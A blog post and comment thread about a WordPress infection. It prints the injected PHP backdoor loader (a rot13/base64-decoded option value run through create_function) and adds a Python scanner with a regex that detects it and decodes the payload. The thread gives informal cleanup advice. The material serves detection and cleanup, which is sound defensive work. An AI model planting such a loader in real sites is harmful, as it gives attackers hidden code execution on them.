A New-ish WordPress Hack

DELETE anything that looks like the below from all your theme files.

$z=get_option("_transient_feed_fbc2353992919b11fc48934d3e55bd94"); $z=base64_decode(str_rot13($z)); if(strpos($z,"95A5440F")!==false){ $_z=create_function("",$z); @$_z(); }
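As an added example, not part of the original post, here is a small Python scanner that does two things a cleanup usually needs: it walks a WordPress tree and reports every PHP file containing a loader of the shape shown above (a get_option() call on a fake "_transient_feed_..." option, followed by base64_decode(str_rot13()) and create_function()), and it reverses the loader's obfuscation so the value pulled out of wp_options can be inspected in plain text. The directory layout, file contents and option value it builds are constructed test data; nothing here is the real payload.

```python
import base64
import codecs
import os
import re
import tempfile

# Regex for the injected loader: get_option() on a fake "_transient_feed_<hex>"
# option, then base64_decode(str_rot13(...)), then create_function(). Written for
# detection only; it tolerates extra whitespace and either quote style.
LOADER_RE = re.compile(
    r'get_option\(\s*["\']_transient_feed_[0-9a-f]+["\']\s*\)'
    r".*?base64_decode\(\s*str_rot13\("
    r".*?create_function\(",
    re.DOTALL,
)

# Constructed sample of an infected theme file (same shape as the line in the post).
SAMPLE_LOADER = (
    "<?php\n"
    "// constructed sample of the injected loader, for testing the scanner\n"
    '$z=get_option("_transient_feed_fbc2353992919b11fc48934d3e55bd94"); '
    "$z=base64_decode(str_rot13($z)); "
    'if(strpos($z,"95A5440F")!==false){ $_z=create_function("",$z); @$_z(); }\n'
    "?>\n"
)


def scan_file(path):
    """Return [(line_number, snippet), ...] for each loader match in one file."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    hits = []
    for m in LOADER_RE.finditer(text):
        line_no = text.count("\n", 0, m.start()) + 1
        hits.append((line_no, m.group(0)[:80]))
    return hits


def scan_tree(root):
    """Walk an install and return {relative_path: hits} for every PHP file that matches."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            hits = scan_file(full)
            if hits:
                findings[os.path.relpath(full, root)] = hits
    return findings


def decode_payload(option_value):
    """Undo what the loader does at run time: base64_decode(str_rot13(value)).
    str_rot13 only touches letters, so base64 digits and padding pass through unchanged."""
    return base64.b64decode(codecs.decode(option_value, "rot_13"))


def payload_is_live(decoded, marker=b"95A5440F"):
    """The loader only executes the blob when this marker is present in the decoded text."""
    return marker in decoded


def make_sample_option(payload):
    """Test fixture only: store a blob the way the loader expects to read it back."""
    return codecs.encode(base64.b64encode(payload).decode("ascii"), "rot_13")


def build_sample_tree():
    """Create a throwaway directory shaped like a WordPress install (constructed data)."""
    root = tempfile.mkdtemp(prefix="wp-scan-demo-")
    theme = os.path.join(root, "wp-content", "themes", "sample")
    os.makedirs(theme)
    with open(os.path.join(theme, "header.php"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_LOADER)          # infected
    with open(os.path.join(theme, "footer.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php\nwp_footer();\n?>\n")  # clean
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    for rel, hits in sorted(scan_tree(root).items()):
        for line_no, snippet in hits:
            print(f"{rel}:{line_no}: {snippet}")
    sample = make_sample_option(b"/* constructed 95A5440F test blob, not real malware */")
    decoded = decode_payload(sample)
    print("decoded:", decoded.decode(), "| would execute:", payload_is_live(decoded))
```

Point scan_tree() at the real document root instead of the constructed one to list every file that needs the injected line removed; feed decode_payload() the option_value column of the matching wp_options row (via phpMyAdmin or wp-config.php credentials) to see what was being executed before you delete the row.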

If you found this information helpful, please consider making a donation. No amount is too small.
paypal.me/andrewapeterson

Bitcoin Donation Address:
1KAAN2ULpdZ2cjegDHYTXP1qXGLUybs5H6

14 Replies to “A New-ish WordPress Hack”

  1. Hi there – could you point me to some more information about this hack? One of the sites I work on might be infected. It’s broken because it has that variable appended on some of the files. Where do I look for the Base64 code?

  2. @techgirl,
    You know,
    I don’t really know for sure. You’re probably smarter than me.
    BUT
    I do know that you should check all the site’s file permissions. The hosting company can probably do a site-wide reset.
    You should also look through the database. One site I saw this on, at one point, had its “name” as in Settings>>General and/or siteurl and/or home settings from the wp_options table overwritten.
    Also, a user may be injected.
    Probably just overwrite the entire WP core through the auto installer.
    Can you get into the site at all?
    Also, usually there’s a big chunk of encrypted nonsense in one of the theme files with these hacks, but I didn’t see any such thing with the two sites I’ve seen that have had this newish hack.
    What hosting company is it?
    It might actually be their fault.
    Please keep me updated as I like to publish this kind of stuff for the next frustrated victim.

    I’m happy to help if you think I can.

    -Andrew

  3. I can’t get into the WP dashboard, and, strangely, I can’t find the site DB to search it that way. The DBs for the client’s other web sites in the same hosting account are all there.

    The host is Dreamhost. They originally dismissed hacking, but no one has replied to any of my emails about this strange z variable. This may be a coincidence, but a few hours ago the data center that would be handling my client’s web site went down for “maintenance”. Perhaps there is something more going on here.

    I can still access the site files via ftp, so if I knew where to look, I could just manually replace problem files.

  4. OK
    Well if it’s like what happened to me, there’s a redirect on the login screen.
    Try temporarily renaming .htaccess, so the permalink settings will be disabled.

    You need to find the database in the hosting account. From there, in wp_users or wp_usermeta or something like that, you can at least get the usernames and change email addresses of users so you can do a password reset if you need to.

    The malware is most likely in several theme files. Usually in files that most wp themes contain such as
    index.php
    header.php
    footer.php
    single.php
    page.php
    (all in site.com/wp-content/themes/yourtheme/)
    But you should really open every single php file in all installed themes and scan for the code.

    Dreamhost is usually pretty solid. You don’t see the database in the control panel of the account? In case you’re not sure, use wp-config.php to get the database name/password and table prefix (which might not be wp_ )

    you can email me @ andrew a pet e r son at gmai l . com

  5. Still can’t get into the dashboard. However, as I check all the files modified on 1/7 I’m seeing a $z trend.

    wp-content/themes/atahualpa

    functions.php – $z near top
    index.php – $z near top

    In plugins almost every plugin file was modified 1/7 (including Akismet), and they have $z near the top.

    Searching for “64” finds nothing.

    Are seemingly random placements of $z enough for me to call it a hack? Yesterday Dreamhost declared the plugins fine, but I think they just tried turning them on and off.

  6. Yes.
    All that Z shit is malware.
    Just remove the entire PHP section
    <?php some shit ?>

    Back up everything first, and check one file at a time.
    You can rename the entire /plugins/ folder to bulk-deactivate the plugins.

    AAP

  7. Won’t the $z stuff just come back if I can’t find what’s placing the variable? I’m pretty curious about what it’s supposed to contain, too.

  8. The vulnerability is a combination of:

    out of date software (update plugins, themes, wp core… this is probably the main thing)

    lenient permissions (it’s possible that someone set permissions to the wrong thing at some point to get a plugin to work)

    weak passwords (well.. you know)

    Server configuration that has a back door (unlikely with dreamhost, but possible)

    …So remove the malware code to get things to come back to life, update user passwords and remove unneeded users, update all the software and have the hosting company reset the file permissions.

  9. Also, any other WP installations on the same hosting account are likely compromised, even if they haven’t started acting up yet.

  10. aw.

    Okay, I’ll check the others tomorrow. This account is very old, but I’ve updated WP regularly, and I’ve tried to keep on top of the latest security measures.

    While hunting, it occurred to me that a hacker might enjoy the irony of getting in through the “automated updates” plugin. The $z could stand for zip. But still no luck finding the base64 statement.

    I wish I could get into the db so I could just search all the files in one go. There’s probably some shell way to do it, but that’s beyond my skillset.

  11. I got into the db. It wasn’t missing – I was just confused by the lack of title consistency (and mystified why the oldest/biggest web site has a minuscule db).

    Anyway I found base64 in wp_options – but it’s in the info for the exploit scanner plugin, where it’s supposed to be. I’m trying to get a closer look at the exploit scanner plugin, but phpmyadmin won’t let me browse it for some reason.

  12. I don’t think you need to worry too much about that. I think you just need to clean the files, get into the site, update everything, update passwords and fix file permissions. Good luck.

Comments are closed.